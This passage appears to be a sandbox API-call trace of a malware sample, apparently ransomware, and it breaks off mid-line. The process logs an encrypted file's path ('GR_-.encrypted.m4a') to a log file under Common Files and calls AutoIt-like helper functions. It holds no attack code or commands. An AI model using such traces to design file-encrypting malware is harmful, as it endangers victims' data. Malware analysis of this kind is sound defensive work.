[0039.046] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0039.046] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0039.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.046] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.046] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.046] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.046] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.047] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.047] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0039.047] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.047] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0039.047] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.047] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0039.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.047] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0039.047] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x27a9, lpOverlapped=0x0) returned 1 [0039.048] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0039.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x27a9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.048] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0039.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0039.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.encrypted.m4a\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0039.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4b) returned 0x7f3630 [0039.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.encrypted.m4a\r\n", cchWideChar=75, lpMultiByteStr=0x7f3630, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\GR_-.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 75 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f36e0 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0039.048] WriteFile (in: hFile=0x128, lpBuffer=0x7f36e0*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f36e0*, lpNumberOfBytesWritten=0x6aee3c*=0x4a, lpOverlapped=0x0) returned 1 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0039.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0039.048] CloseHandle (hObject=0x128) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0039.049] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0039.049] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.051] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0039.051] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.051] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.051] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af3f8 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0039.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c760 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0039.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0039.052] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0039.052] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0039.052] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.053] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.054] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.054] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0039.054] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0039.055] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0039.055] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | 